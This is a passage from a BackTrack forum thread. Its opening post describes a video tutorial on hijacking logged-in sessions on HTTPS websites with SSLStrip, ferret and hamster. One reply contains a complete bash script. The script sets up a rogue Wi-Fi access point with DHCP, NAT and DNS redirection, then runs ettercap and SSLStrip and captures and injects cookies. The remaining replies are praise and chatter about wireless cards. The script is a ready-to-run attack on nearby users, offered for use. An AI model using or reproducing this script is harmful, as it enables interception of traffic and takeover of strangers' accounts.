Page 1 of 3 123 LastLast
Results 1 to 10 of 28

Thread: Backtrack Series - 12: Session Hijacking for Secure Websites

  1. #1
    Junior Member
    Join Date
    Feb 2010
    Posts
    38

    Default Backtrack Series - 12: Session Hijacking for Secure Websites

    In this tutorial we will hijack a live session so that we can have the same priviliges of the account without having any information about the username and password. We will start by redirecting the secure traffic to an insecure server using SSLStrip, next we use ferret to extract cookies from the traffic and then we will use hamster to inject the cookies in the browser

    This is the link for the online video:
    Online Video

    And here you can find the required files (video12.txt which has the complete explanation)
    Attachments

  2. #2
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    5

    Default

    can you put that modified Roguev3.sh ? please

    and thanks it's good series i love it :*

  3. #3
    Junior Member
    Join Date
    Feb 2010
    Posts
    38

    Default

    Quote Originally Posted by imaginary View Post
    can you put that modified Roguev3.sh ? please

    and thanks it's good series i love it :*
    It's available in the attachments of my previous tutorial
    Backtrack Series 11: Retrieving Forum Passwords Using MITM + Rcrack

    Thnx for the support

  4. #4

    Default

    Another great video!
    Good quality and great content.
    Thank you, looking to try this soon. As mentioned in the other post also looking forward to more, keep up the great work.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  5. #5

    Default

    *YEY*
    Another vid for the backtrack series!
    Will give it a go myself some stage tomorrow!
    Well done && thanks! (=

    edit:
    Work well for me (=

    Download the video [HD] (with the guide & Roguev3.sh)
    http://www.mediafire.com/download.php?gyunjtyzmmu
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  6. #6
    Just burned his ISO imported_K1LLb0x's Avatar
    Join Date
    Jun 2009
    Posts
    5

    Default

    wow, your videos are awesome, keep up the good work and keep on using different programs...

  7. #7
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default Using the Rogue3.sh script + seesion 12 with ppp0 (PPPoA or PPPoE)

    Your videos are more than excellent. I was playing with your script and since I have a dsl modem to connect to internet I modify a bit your script to work with point to point connections. So, here it is:

    Code:
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example ppp0: "
    read -e IFACE
    echo -n "Enter your Internet IP address for ppp0, IP(XXX.XXX.XXX.XXX): "
    read -e INETIP
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional,]: "
    read -e MAC
    echo -n "Enter the channel you would like your rogue AP to be called [Optional]: "
    read -e CHAN
    
    # installing DNSMASQ
    apt-get install dnsmasq-base
    
    killall -9 dhcpcd dhcpd3 airbase-ng ettercap dnsmasq
    # stop mon0
    airmon-ng stop mon0
    airmon-ng stop $WIFACE
    
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun &
    
    cmd="konsole -e airbase-ng -e ""$ESSID"" -P -C 30 -v "
    if [ -n "$CHAN" ]; then
    cmd=$cmd"-c "$CHAN" "
    fi
    if [ -n "$MAC" ]; then
    cmd=$cmd"-a "$MAC" "
    fi
    cmd=$cmd"$WIFACE"
    $cmd &
    
    echo "Witing 10 seconds for the SoftAP to be established"
    sleep 10
    echo "SoftAP should be working now"
    
    ifconfig at0 up
    ifconfig at0 192.168.1.129 netmask 255.255.255.128
    ifconfig at0 mtu 1400
    route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
    
    # create custom dhcpd.conf for WLAN
    # my ISP's DNS servers are: 195.170.0.1 and 195.170.2.2
    
    cat > dhcpd.conf << EOF
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.1.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.129;
    option domain-name-servers 195.170.0.1, 195.170.2.2;
    range 192.168.1.130 192.168.1.140;
    }
    EOF
    
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT # rogue gateway
    
    # my internet's dynamic IP
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $INETIP
    
    rm /var/run/dhcpd.pid
    touch /var/run/dhcpd.pid
    chgrp dhcpd /var/run/dhcpd.pid
    chown dhcpd /var/run/dhcpd.pid
    
    # run custom dhcpd file
    konsole -e dhcpd3 -d -f -cf dhcpd.conf at0 &
    
    ## solve our dns forwarder
    dnsmasq restart
    
    konsole -e ettercap -T -p -q -i at0 // // &
    echo "Witing 8 seconds for portforwarding and DHCP server"
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo "Portforwarding and DHCP should be working now"
    
    # Starting SSLStrip
    konsole -e sslstrip -p &
    echo "Starting SSLStrip"
    sleep 3
    
    # Forward all 80 port traffic to port 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo "Forward all 80 port traffic to port 10000"
    sleep 3
    
    # Starting ferret
    konsole -e /pentest/sniffers/hamster/./ferret -i at0 &
    echo "Starting ferret"
    sleep 3
    
    # Starting hamster
    konsole -e /pentest/sniffers/hamster/hamster &
    echo "Starting Hamster"
    sleep 3
    My IP is dynamic and the DNS Servers of my ISP are 195.170.0.1 and 195.170.2.2.
    Sorry for any mistakes that I have made (in the script and in English grammar and syntax). I am in the scene since Amstrad 464 (yes with tape) and i am a little bit rusty (if this is the correct word)
    BTW the only problem that I have is when i create a AP (atheros based card AR5001X+)with airbase-ng the data rate is very slow. I tried both drivers mac and madwifi. I change rate ,rts, etc and the rate and nothing change. But when I create a AP with:
    Code:
    wlanconfig ath0 create wlandev wifi0 wlanmode ap
    iwconfig ath0 essid Come_to_Dady
    iwconfig ath0 rate 54M
    it work just great. It is airbase-ng related or driver related problem?
    I am using the SVN version of Aircrack-ng and i was trying in different channels, RTS etc.
    Any Idea
    Anyway.
    My respects to all of you guys and specially to Pureh@te who is helping everybody even those kids who they are too lazy to search around.
    Great work.

  8. #8
    Junior Member
    Join Date
    Feb 2010
    Posts
    38

    Default

    Thnx for the additional information
    Please note that this script is a modified version of Deathray script
    I've noticed that it's slow with some configurations, like when the client uses Windows Vista
    I'll try your method and then give you my feedback

  9. #9
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    Any news fifo_thekid?
    Have you achieve any higher data rates?
    I believe that to accomplish this kind of your lessons the softAP that you have made must act as an AP. Correct my if I am wrong. Also there is some kind of setting that i must configure in my atheros based Wifi card to make act more accurate as an AP except :
    Code:
    wlanconfig ath0 create wlandev wifi0 wlanmode ap
    iwconfig ath0 essid Home_wifi
    iwconfig ath0 channel 11
    iwconfig ath0 rate 54M
    I have read all the outputs that give me the iwpriv and iwconfig.
    Understand some ,reading for the rest.
    Since I am trying to get back in the scene (for hobby) and the "have a life, growing kids" matter dosn't left me much free time to read, the question is:
    Am I in wrong path?
    Any idea?
    I am verry shame for my english.
    Hope you understand me.

  10. #10
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    10

    Default

    Nice stuff... thx...

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •